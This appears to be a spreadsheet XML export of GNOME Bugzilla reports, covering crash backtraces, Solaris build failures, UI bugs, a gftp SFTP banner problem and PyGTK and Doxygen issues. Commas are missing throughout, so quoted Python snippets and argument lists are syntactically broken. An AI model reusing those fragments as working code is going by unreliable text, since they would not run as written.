#5  0x405efc08 in __libc_free (mem=0x80d12c8) at malloc.c:3044
3044	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0x40690f60
p = 0x80d12c0
ar_ptr = (arena *) 0x40690f60
p = 0x80d12c0
#6  0x4056981b in free_buffer () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
#7  0x405697ea in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-02-08 03:59 -------
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (jstarkey@advancecreations.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>jstarkey</t>
  </si>
  <si>
    <t>GFTP-166203</t>
  </si>
  <si>
    <t>gftp has problems with sftp when connecting to a ssh server with a banner.</t>
  </si>
  <si>
    <t>Configure sftp server. In /etc/ssh/sshd_conf use this line: 
# no default banner path
Banner /etc/motd
Use gftp to access this server and see the error:
Opening SSH connection to 50.22.21.123
Running program ssh -e none -l grizzly -p 22 50.22.21.123 -s sftp
3: Protocol Initialization
There was an error initializing a SSH connection with the remote server. The
error message from the remote server follows:
Authorized Use ONLY!
Disconnecting from site 50.22.21.123
comment out Banner /etc/motd in /etc/ssh/sshd_conf 
restart sshd
connect to the server with gftp fine.</t>
  </si>
  <si>
    <t>surenko</t>
  </si>
  <si>
    <t>GTKHTML-210112</t>
  </si>
  <si>
    <t>Normal and Numbered list have same shortcut</t>
  </si>
  <si>
    <t>M-m h n looks like it will activate Normal but really it activates
Numbered list.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-343138</t>
  </si>
  <si>
    <t>cpufreq</t>
  </si>
  <si>
    <t>[help-cpufreq-applet] bad spelling in string #88</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/distros/ubuntu/+source/gnome-applets/+bug/45635
.po : help-cpufreq-applet
String #88 is :
This option allows you to choose how much information is show in the frequency selector dropdown (see ). You can select to display Frequencies Governors or both Frequencies and Governors. 
Mistake : show --&gt; shown</t>
  </si>
  <si>
    <t>GNOME-UTILS-74195</t>
  </si>
  <si>
    <t>Compilation(using forte) of gcalc on Solaris fails</t>
  </si>
  <si>
    <t>While compiling gcalc on Solaris (using forte compiler) the compilation 
fails giving following error:
ild: (undefined symbol) XCreatePixmap -- referenced in the text segment of
sr.o
ild: (undefined symbol) XCreateSimpleWindow -- referenced in the text
segment of sr.o
ild: (undefined symbol) XPending -- referenced in the text segment of sr.o
ild: (undefined symbol) XCopyArea -- referenced in the text segment of sr.o
ild: (undefined symbol) XCreateFontCursor -- referenced in the text segment
of sr.o
ild: (undefined symbol) XMoveResizeWindow -- referenced in the text segment
of sr.o
ild: (undefined symbol) XDefineCursor -- referenced in the text segment of
sr.o
ild: (undefined symbol) XParseGeometry -- referenced in the text segment of
sr.o
ild: (undefined symbol) XSetStandardProperties -- referenced in the text
segment of sr.o
ild: (undefined symbol) XMoveWindow -- referenced in the text segment of
sr.o
ild: (undefined symbol) XDrawString -- referenced in the text segment of
sr.o
ild: (undefined symbol) XDrawImageString -- referenced in the text segment
of sr.o
ild: (undefined symbol) XGetGeometry -- referenced in the text segment of
sr.o
ild: (undefined symbol) XFillRectangle -- referenced in the text segment of
sr.o
ild: (undefined symbol) XResizeWindow -- referenced in the text segment of
sr.o
ild: (undefined symbol) XCreateGC -- referenced in the text segment of sr.o
ild: (undefined symbol) XFreePixmap -- referenced in the text segment of
sr.o
ild: (undefined symbol) XNextEvent -- referenced in the text segment of
sr.o
ild: (undefined symbol) XMapSubwindows -- referenced in the text segment of
sr.o
ild: (undefined symbol) XSelectInput -- referenced in the text segment of
sr.o
ild: (undefined symbol) XQueryPointer -- referenced in the text segment of
sr.o
ild: (undefined symbol) XMapWindow -- referenced in the text segment of
sr.o
ild: (undefined symbol) XSetWindowBorder -- referenced in the text segment
of sr.o
ild: (undefined symbol) XClearWindow -- referenced in the text segment of
sr.o
ild: (undefined symbol) XClearArea -- referenced in the text segment of
sr.o
ild: (undefined symbol) XPeekEvent -- referenced in the text segment of
sr.o
ild: (undefined symbol) XLoadQueryFont -- referenced in the text segment of
sr.o
ild: (undefined symbol) XDrawLine -- referenced in the text segment of sr.o
make[1]: *** [gnome-calculator] Error 5
make: *** [all-recursive] Error 1</t>
  </si>
  <si>
    <t>GNOME-APPLETS-118781</t>
  </si>
  <si>
    <t>selecting UK layout the applet still uses previous layout flag</t>
  </si>
  <si>
    <t>Open preferences and add UK 105-key layout.
After this add one more layout which has a flag (Say Arabic)
Click the applet to cycle through 'default' 'US' and 'UK' and the Arabic
layouts.
The US layout would be shown twice and then the Arabic layout will be
shown. The UK layout which does not have a flag will not be shown.</t>
  </si>
  <si>
    <t>GALEON-84450</t>
  </si>
  <si>
    <t>popups don't stay poped up</t>
  </si>
  <si>
    <t>right click in the window if you release the mouse button the popup will
disappear. This happens in the nautilus view as well</t>
  </si>
  <si>
    <t>NAUTILUS-329781</t>
  </si>
  <si>
    <t>Locaion Bar showing (null)</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Gentoo Base System version 1.6.14
Package: nautilus
Severity: trivial
Version: GNOME2.13.4
Gnome-Distributor: BreakMyGentoo.net
Synopsis: Locaion Bar showing (null)
Bugzilla-Product: nautilus
Bugzilla-Component: Navigation
Bugzilla-Version: 2.12.x
Description:
Description of Problem:
when laction is entered with out a leading slash / buttons on lacation
bar are screwed. I know that this problem also occurs in 2.12.
Steps to reproduce the problem:
1. hit Ctl+L in nautilus window
2. enter some path without leading / for example:
usr/share/icons/hicolor
-- 
Regards
NEMO 
------- Bug created by bug-buddy at 2006-02-03 13:45 -------
Bugreport had an attachment. This cannot be imported to Bugzilla.
Contact bugmaster@gnome.org if you are willing to write a patch for this.
</t>
  </si>
  <si>
    <t>NEMO</t>
  </si>
  <si>
    <t>PYGTK-162874</t>
  </si>
  <si>
    <t>gtk.ActionGroup.add_actions() keeps a reference forever</t>
  </si>
  <si>
    <t>We've been implementing Epiphany wrappers using PyGTK so people can write Python
wrappers for Epiphany. It all works very well except when we try to merge into
Epiphany's existing menus. Take the following example code:
def console_cb(action window):
        print Here
_actions = [
        ('PythonConsole' None 'P_ython Console' None None console_cb)
]
def attach_window(window):
        ui_manager = window.get_ui_manager()
        group = gtk.ActionGroup('PythonConsole')
        group.add_actions(_actions window)
        ui_manager.insert_action_group(group 0)
        ui_id = ui_manager.add_ui_from_string(_ui_str)
        window.set_data('PythonConsoleWindowData' (group ui_id))
def detach_window(window):
        ui_manager = window.get_ui_manager()
        group ui_id = window.get_data('PythonConsoleWindowData')
        window.set_data('PythonConsoleWindowData' None)
        ui_manager.remove_ui(ui_id)
        ui_manager.remove_action_group(group)
When Epiphany closes or the extension is unloaded (both of which call
detach_window and then Py_DECREF on the EphyWindow's PyGObject) a reference is
still held on the EphyWindow.
If the code is changed to explicitly connect the signal (by creating a
gtk.Action and running action.connect()) and then explicitly disconnect the
signal in detach_window the extra reference is gone (i.e. this bug doesn't occur).
Please don't flame me if I overlooked something -- this stuff isn't simple! (But
besides UIManager stuff it actually works -- and yeah we can actually pop up a
Python console!)</t>
  </si>
  <si>
    <t>GSTREAMER-312901</t>
  </si>
  <si>
    <t>Random linking/unlinking doesn't work</t>
  </si>
  <si>
    <t>Attached is a testcase that does random links/unlinks. The goal is to toggle
visualizations of an audio track in runtime I can't get the testcase much
simpler than this. When playing the toggle works and pausing works also. Now
the problem comes when doing either together:
(start) - toggle off - play - toggle on:
hangs with:
(gdb) thread apply all bt
Thread 6 (Thread -1210405968 (LWP 3187)):
#0  0x00159402 in ?? ()
#1  0x00d7a7b6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0x00674117 in gst_system_clock_async_thread (clock=0x940f178)
    at gstsystemclock.c:235
#3  0x00b68e9a in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#4  0x00d78b89 in start_thread () from /lib/libpthread.so.0
#5  0x00a8608e in clone () from /lib/libc.so.6
Thread 5 (Thread -1222145104 (LWP 3189)):
#0  0x00159402 in ?? ()
#1  0x00d7a7b6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0x0066f5eb in gst_queue_loop (pad=0x94054b0) at gstqueue.c:737
#3  0x0067789f in gst_task_func (task=0x9472548 tclass=0x9472480)
    at gsttask.c:126
#4  0x00b6ab5a in g_thread_pool_free () from /usr/lib/libglib-2.0.so.0
#5  0x00b68e9a in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#6  0x00d78b89 in start_thread () from /lib/libpthread.so.0
#7  0x00a8608e in clone () from /lib/libc.so.6
Thread 4 (Thread -1236829264 (LWP 3190)):
#0  0x00159402 in ?? ()
---Type  to continue or q  to quit---
#1  0x00d7a7b6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0x006779fb in gst_task_func (task=0x9484028 tclass=0x9472480)
    at gsttask.c:114
#3  0x00b6ab5a in g_thread_pool_free () from /usr/lib/libglib-2.0.so.0
#4  0x00b68e9a in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#5  0x00d78b89 in start_thread () from /lib/libpthread.so.0
#6  0x00a8608e in clone () from /lib/libc.so.6
Thread 3 (Thread -1247319120 (LWP 3191)):
#0  0x00159402 in ?? ()
#1  0x00d7d0cb in __write_nocancel () from /lib/libpthread.so.0
#2  0x0057f296 in gst_oss_sink_write (asink=0x940e298 data=0x950e228
    length=1024) at gstosssink.c:335
#3  0x0056cd6c in audioringbuffer_thread_func (buf=0x9472298)
    at gstaudiosink.c:169
#4  0x00b68e9a in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#5  0x00d78b89 in start_thread () from /lib/libpthread.so.0
#6  0x00a8608e in clone () from /lib/libc.so.6
Thread 2 (Thread -1257808976 (LWP 3192)):
#0  0x00159402 in ?? ()
#1  0x00d7a7b6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0x0066f5eb in gst_queue_loop (pad=0x9410520) at gstqueue.c:737
---Type  to continue or q  to quit---
#3  0x0067789f in gst_task_func (task=0x94bb198 tclass=0x9472480)
    at gsttask.c:126
#4  0x00b6ab5a in g_thread_pool_free () from /usr/lib/libglib-2.0.so.0
#5  0x00b68e9a in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#6  0x00d78b89 in start_thread () from /lib/libpthread.so.0
#7  0x00a8608e in clone () from /lib/libc.so.6
Thread 1 (Thread -1208280640 (LWP 3173)):
#0  0x00159402 in ?? ()
#1  0x00a7c11c in poll () from /lib/libc.so.6
#2  0x00b50248 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#3  0x00b506e3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#4  0x080499c6 in main ()
or
(start) - play - pause - toggle off - play - pause - toggle on - play:
ERROR (0x9496330 - 0:00:23.524412000)        basesink( 3126)
gstbasesink.c(518):gst_base_sink_handle_object: received buffer
without a discont</t>
  </si>
  <si>
    <t>EVOLUTION-224162</t>
  </si>
  <si>
    <t>Crash trying to debug with gdb</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3
Synopsis: Crash trying to debug with gdb
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Description of Problem:
Just today (after an apt-get upgrade) I started having a problem where
evolution-mail would crash in the midst of a mail fetch. I tried gdb
`which evolution-mail` 2203 (the correct pid) and gdb connected to the
process. Soon thereafter bug-buddy popped up and gdb lost contact with
the process.
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-mail'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ew Thread 1024 (LWP 2158)]
[New Thread 2049 (LWP 2201)]
[New Thread 1026 (LWP 2202)]
[New Thread 2051 (LWP 2203)]
[New Thread 3076 (LWP 2206)]
[New Thread 4101 (LWP 2207)]
[New Thread 5126 (LWP 2236)]
(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0x41059a39 in wait4 () from
/lib/libc.so.6
#0  0x41059a39 in wait4 () from /lib/libc.so.6
#1  0x410d0e48 in __check_rhosts_file () from /lib/libc.so.6
#2  0x40fb0453 in waitpid () from /lib/libpthread.so.0
#3  0x409ab706 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x0809e214 in message_browser_get_type ()
#5  0x40fadf54 in pthread_sighandler () from /lib/libpthread.so.0
#6  0x40fe26b8 in sigaction () from /lib/libc.so.6
#7  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
#8  0x40fad08c in pthread_create@@GLIBC_2.1 () from
/lib/libpthread.so.0
#9  0x4007d28b in e_thread_put () from /usr/lib/libcamel.so.0
#10 0x080750b1 in folder_browser_ui_message_loaded ()
#11 0x080750d0 in folder_browser_ui_message_loaded ()
#12 0x0806af28 in _ORBIT_skel_GNOME_Evolution_FolderInfo_getInfo ()
#13 0x40f387e5 in ORBit_POA_handle_request () from
/usr/lib/libORBit.so.0
#14 0x40f3abb2 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#15 0x40f3ae01 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#16 0x40f508f3 in giop_recv_reply_buffer_use_multiple_2 ()
   from /usr/lib/libIIOP.so.0
#17 0x40f509bd in giop_recv_reply_buffer_use_2 () from
/usr/lib/libIIOP.so.0
#18 0x401ffc94 in GNOME_Evolution_Storage_updateFolder ()
   from /usr/lib/libeshell.so.0
#19 0x0808a7e9 in mail_display_get_type ()
#20 0x0809364b in mail_msg_init ()
#21 0x08093197 in mail_msg_wait_all ()
#22 0x40f90c40 in g_io_add_watch () from /usr/lib/libglib-1.2.so.0
#23 0x40f92309 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#24 0x40f92913 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#25 0x40f929c5 in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#26 0x40d2aa4a in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#27 0x4049bc9d in bonobo_control_windowid_from_x11 ()
   from /usr/lib/libbonobox.so.2
#28 0x4049bcd2 in bonobo_control_windowid_from_x11 ()
   from /usr/lib/libbonobox.so.2
#29 0x4045249f in _ORBIT_skel_Bonobo_Control_realize ()
   from /usr/lib/libbonobo.so.2
#30 0x40f387e5 in ORBit_POA_handle_request () from
/usr/lib/libORBit.so.0
#31 0x40f3abb2 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#32 0x40f3ae01 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#33 0x40f508f3 in giop_recv_reply_buffer_use_multiple_2 ()
   from /usr/lib/libIIOP.so.0
#34 0x40f509bd in giop_recv_reply_buffer_use_2 () from
/usr/lib/libIIOP.so.0
#35 0x40437caf in Bonobo_Unknown_ref () from /usr/lib/libbonobo.so.2
#36 0x40466d8c in bonobo_unknown_ping () from /usr/lib/libbonobo.so.2
#37 0x402078fa in evolution_shell_component_client_get_type ()
   from /usr/lib/libeshell.so.0
#38 0x40f9322a in g_main_set_poll_func () from
/usr/lib/libglib-1.2.so.0
#39 0x40f92309 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#40 0x40f92913 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#41 0x40f92aac in g_main_run () from /usr/lib/libglib-1.2.so.0
#42 0x40d2a7e7 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#43 0x40461ebd in bonobo_main () from /usr/lib/libbonobo.so.2
#44 0x0809e443 in main ()
#45 0x40fd214f in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 5126 (LWP 2236)):
#0  0x40fe287e in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40faf636 in __pthread_lock () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40fab0ed in pthread_start_thread_event () from
/lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 4101 (LWP 2207)):
#0  0x40fe287e in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40fafa36 in __pthread_alt_lock () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40fabfd2 in pthread_mutex_lock () from /lib/libpthread.so.0
No symbol table info available.
#4  0x4007d00e in e_thread_set_msg_received () from
/usr/lib/libcamel.so.0
No symbol table info available.
#5  0x40fab0ba in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 2206)):
#0  0x40fe287e in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40fafa36 in __pthread_alt_lock () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40fabfd2 in pthread_mutex_lock () from /lib/libpthread.so.0
No symbol table info available.
#4  0x4007d00e in e_thread_set_msg_received () from
/usr/lib/libcamel.so.0
No symbol table info available.
#5  0x40fab0ba in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 2203)):
#0  0x40fe287e in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40fafa36 in __pthread_alt_lock () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40fabfd2 in pthread_mutex_lock () from /lib/libpthread.so.0
No symbol table info available.
#4  0x40069b1e in camel_store_get_folder () from /usr/lib/libcamel.so.0
No symbol table info available.
#5  0x0809bace in mail_tool_uri_to_folder ()
No symbol table info available.
#6  0x0809bf8b in mail_tools_x_evolution_message_parse ()
No symbol table info available.
#7  0x08093324 in mail_msg_wait_all ()
No symbol table info available.
#8  0x4007cf5a in e_thread_set_msg_received () from
/usr/lib/libcamel.so.0
No symbol table info available.
#9  0x4007d0e9 in e_thread_set_msg_received () from
/usr/lib/libcamel.so.0
No symbol table info available.
#10 0x40fab0ba in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 2202)):
#0  0x40fe287e in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40faa102 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x4007c9f5 in e_msgport_wait () from /usr/lib/libcamel.so.0
No symbol table info available.
#4  0x4007d05b in e_thread_set_msg_received () from
/usr/lib/libcamel.so.0
No symbol table info available.
#5  0x40fab0ba in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 2201)):
#0  0x40fe287e in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40fad879 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40fafa36 in __pthread_alt_lock () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40fabfd2 in pthread_mutex_lock () from /lib/libpthread.so.0
No symbol table info available.
#4  0x0809e25d in message_browser_get_type ()
No symbol table info available.
#5  0x40fadf54 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  0x40fe26b8 in sigaction () from /lib/libc.so.6
No symbol table info available.
#7  0x70fff045 in ?? ()
No symbol table info available.
#0  0x41059a39 in wait4 () from /lib/libc.so.6
</t>
  </si>
  <si>
    <t>bfrantzdale</t>
  </si>
  <si>
    <t>EVOLUTION-226903</t>
  </si>
  <si>
    <t>Advanced search not remembered in Contacts or GAL</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Enter criteria and perform an advanced search when you go to search again
the criteria from previous search are not remembered. 
Steps to reproduce the problem:
1. Perform an advanced search 
2. Retry advanced search
3. 
Actual Results:
get default ( empty ) advanced search
Expected Results:
remembers last advanced query
How often does this happen? 
everytime
Additional Information:
Machine Configuration
-------------------------------------------------------------
Linux tlee 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
soup-0.7.5-snap.ximian.200206230601
ximian-connector-1.0.4-snap.ximian.200206230601
evolution-1.0.7.99-snap.ximian.200206230601
gal-0.19.3-snap.ximian.200206230601
gtkhtml-1.0.4.99-snap.ximian.200206230601</t>
  </si>
  <si>
    <t>EVOLUTION-208784</t>
  </si>
  <si>
    <t>Crash after fetching mail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12
Synopsis: Crash after fetching mail
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
After seting new mail account and fetching 33 messages from pop3 server
without deleting it from server Evolution crashed.
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 1024 (LWP 12416)]
0x40a28cf9 in wait4 () from /lib/libc.so.6
#0  0x40a28cf9 in wait4 () from /lib/libc.so.6
#1  0x40aa58e8 in __check_rhosts_file () from /lib/libc.so.6
#2  0x4036d9f6 in waitpid (pid=12490 stat_loc=0xbfffe36c options=0) at wrapsyscall.c:172
#3  0x40104909 in gnome_icon_entry_get_type () from /usr/lib/libgnomeui.so.32
#4  0x4099c7b8 in killpg () from /lib/libc.so.6
#5  0x409e1642 in vsprintf () from /lib/libc.so.6
#6  0x40963d8a in g_strdup_printf () from /usr/lib/libglib-1.2.so.0
#7  0x6f6b617a in ?? ()
Unknown reporter: mbajko@whb.pl changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>mbajko</t>
  </si>
  <si>
    <t>GNUMERIC-381011</t>
  </si>
  <si>
    <t>Cell copy animation slows down the GUI and eats the CPU</t>
  </si>
  <si>
    <t>Please describe the problem:
&gt;     I am using gnumeric a lot for large spreadsheets and have found 
&gt; that its performance suffers drastically when I copy large areas (20 
&gt; cols x 1000
&gt; rows) to different areas of a spreadsheet. This degradation of 
&gt; performance continues and/or worsens unless I reset the copy area to a 
&gt; single cell. Is this easy to fix? Anyway thanks for a great product !
UPDATE: see below
Steps to reproduce:
1. create large spreadsheet (100 cols by 5000 rows
2. copy a large section of the spreadsheet (25x2000)
3. notice slowdown
4. copy 1x1 area and slowdown stops
5. think is it xorg + gnumeric interaction with outlining dashes?
Actual results:
desktop slows to a crawl
Expected results:
normal desktop speed
Does this happen every time?
yes
Other information:
Update : When running top xorg and gnumeric show running at high speed (high percentage using top) when clipboard is CTRL+C activated. Once a 1x1 CTRL+C is done to change the contents of the clipboard the top sysload drops to 2%</t>
  </si>
  <si>
    <t>chris.haidinyak</t>
  </si>
  <si>
    <t>GNOME-MENUS-168616</t>
  </si>
  <si>
    <t>Default layout should place  at a later position</t>
  </si>
  <si>
    <t>I've just finished a first private version of a GNOME menu editor. It relies on
the correct merging of user data which is merged from
$XDG_DATA_HOME/menus/applications-merged. Because it will contain  and
 commands for menu items the editing heavily depends on the
inclusion/expansion order of the menu hierarchy. Therefore it is absolutely
neccessary to place  below the menu definitions of
applications.menu. This is really cruical for proper menu editing so it should
IMHO be done before 2.10. Data file modification doesn't require release-team
approval right?</t>
  </si>
  <si>
    <t>CONDUIT-523229</t>
  </si>
  <si>
    <t>can't focus the program from the tray icon</t>
  </si>
  <si>
    <t>hi
after I've minimized the program to the tray icon I cant focus it again. I will see a short flash of the window and that was all.
I'm using Ubuntu 7.10 and conduit v. 0.3.2. from the repository.</t>
  </si>
  <si>
    <t>jan.teichmann</t>
  </si>
  <si>
    <t>EVOLUTION-459030</t>
  </si>
  <si>
    <t>Shrink To / Cc / Bcc headers doesn't work</t>
  </si>
  <si>
    <t>The option Shrink To / Cc / Bcc headers to ..  doesn't seem to work longer. 
Other information:</t>
  </si>
  <si>
    <t>GTK+-57051</t>
  </si>
  <si>
    <t>GtkTextView: line disappear when hitting TAB key</t>
  </si>
  <si>
    <t>Witnessed with gtk+-1.3.6:
1) Launch the testtext example in the gtk+/tests directory.
2) Hit [Enter] a few times to create a few empty lines
3) move the cursor to the begining of line 1 for instance and then hit the
[TAB] key. The blinking cursor should disappear as well as the line number
on the left.</t>
  </si>
  <si>
    <t>brobecker</t>
  </si>
  <si>
    <t>EVINCE-347849</t>
  </si>
  <si>
    <t>evince is unable to render pdf files at large size</t>
  </si>
  <si>
    <t>Try to view the attached file in presentation mode or fullscreen non-continuous mode.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-8020</t>
  </si>
  <si>
    <t>Crashed When Loading (gtcd Crash at 134.190.18.57)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gtcd
Version: 1.0.51
Severity: 
&gt;Synopsis: Crashed When Loading
&gt;Class: sw-bug
System: Redhat 6.2 XFree86 4.0
&gt;Description:
Crashed instantly... won't even start
&gt;How-To-Repeat:
Well my theory is that if gtcd cannot access the
font it needs it crashes.  I change the font and it works great.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:34 -------
This bug was previously known as bug 8020 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=8020
Originally filed under the gnome-media product and gtcd component.
Unknown version 1.0.x in product gnome-media. Setting version to the default unspecified.
The original reporter (fenn@nb.aibn) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component peter@ximian.com.
</t>
  </si>
  <si>
    <t>fenn</t>
  </si>
  <si>
    <t>METACITY-326281</t>
  </si>
  <si>
    <t>__PRETTY_FUNCTION__ pragma not available with Solaris forte compiler</t>
  </si>
  <si>
    <t>The Solaris forte compiler (Sun Studio) does not have the __PRETTY_FUNCTION__ pragma. The G_GNUC_PRETTY_FUNCTION define (from glib/gmacros.h) should be used instead.
The pragma is used in src/testboxes.c.
Attached patch makes the G_GNUC_PRETTY_FUNCTION substitution.</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-517909</t>
  </si>
  <si>
    <t>Simple bug guide</t>
  </si>
  <si>
    <t>Missing space between words</t>
  </si>
  <si>
    <t>Please describe the problem:
When submitting a documentation bug one of the prompts displayed is the following:
 What section of the documentation is thisbug in?
There should be a space between this and bug.
Steps to reproduce:
1. Click the New bug link.
2. Select the Documentation type.
3. Press the Next Page button.
4. Select the Platform classification the gtk+ application and press the Next Page button.
5. Select unspecified and Unspecified for the application and GNOME version respectively and press the Next Page button.
Actual results:
The prompt for the fourth field says
 What section of the documentation is thisbug in?
Expected results:
The prompt for the fourth field to say
 What section of the documentation is this bug in?
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>mkraai</t>
  </si>
  <si>
    <t>NETWORKMANAGER-161290</t>
  </si>
  <si>
    <t>screw up config when upgrading hald</t>
  </si>
  <si>
    <t>On Ubuntu upgrade hald with NetwordManager running.
You suddenly lose all the network....
The only way I found was to reboot.
Package is powerpc rebuild package from original Debian source.</t>
  </si>
  <si>
    <t>GSTREAMER-438610</t>
  </si>
  <si>
    <t>[dvddemux] fails after flushing seek</t>
  </si>
  <si>
    <t>Basically dvddemux stores downstream flow returns so it can aggregate these.
In case of a flushing seek FLUSH_START comes through and can make (some) downstream subsequently return WRONG_STATE.  If the seek (and FLUSH_STOP) have finished and streaming resumes the stored WRONG_STATE has not been cleared making dvddemux (or mpegdemux) wrongly conclude/aggregate there is a real problem downstream.  This typically then leads to the pipeline pausing/terminating.
[well yes there is flupsdemux as well but it does not (yet) seem to have a taste for subtitles and that makes working/testing on bug #415754 a bit difficult -)]</t>
  </si>
  <si>
    <t>DOXYGEN-314937</t>
  </si>
  <si>
    <t>Python: does not comment class methods and class comments</t>
  </si>
  <si>
    <t>Version details: 1.4.4
Distribution/Version: WinXP SP2
Parameters for method __init__ are not recognized. Instead a warning message is 
reported:
Warning: argument `self' of command @param is not found in the argument list of 
procModGUI::MainMenuBar::__init__()
Warning: argument `_parent' of command @param is not found in the argument list 
of procModGUI::MainMenuBar::__init__()
Code fragment:
import wx
## The class MainMenuBar is the application s main menu bar.
# It administrates all menu entries.
class MainMenuBar(wx.MenuBar):
  ## Initialize the menu variables.
  # \param self the object itself.
  # \param _parent reference to the parent wx object.
  def __init__(self _parent):
    wx.MenuBar.__init__ (self)
    # initialize some variables
    self.parent_ = _parent
    self.menu_ids_ = 100
    self.menus_ = {}
    self.menu_items_ = {}</t>
  </si>
  <si>
    <t>dfinken</t>
  </si>
  <si>
    <t>EVOLUTION-215399</t>
  </si>
  <si>
    <t>Error while 'Expunging Folder'</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.0
Synopsis: Error while 'Expunging Folder'
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I get the following error when trying to expung my inbox:
Unexpected Response from IMAP server: A02082 BAD Command line too long.
the IMAP server in question is from the RedHat 7.0 Distro
Evolution Version: 0.99.0
Unknown reporter: medvitz@medvitz.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>medvitz</t>
  </si>
  <si>
    <t>GLIB-120653</t>
  </si>
  <si>
    <t>Current stable CVS glib hangs GIMP</t>
  </si>
  <si>
    <t>After the change by Andrew Lanoix on 2003-06-28 to giowin32.c GIMP hangs 
relatively repeatably while doing for instance Xtns&gt;Script-
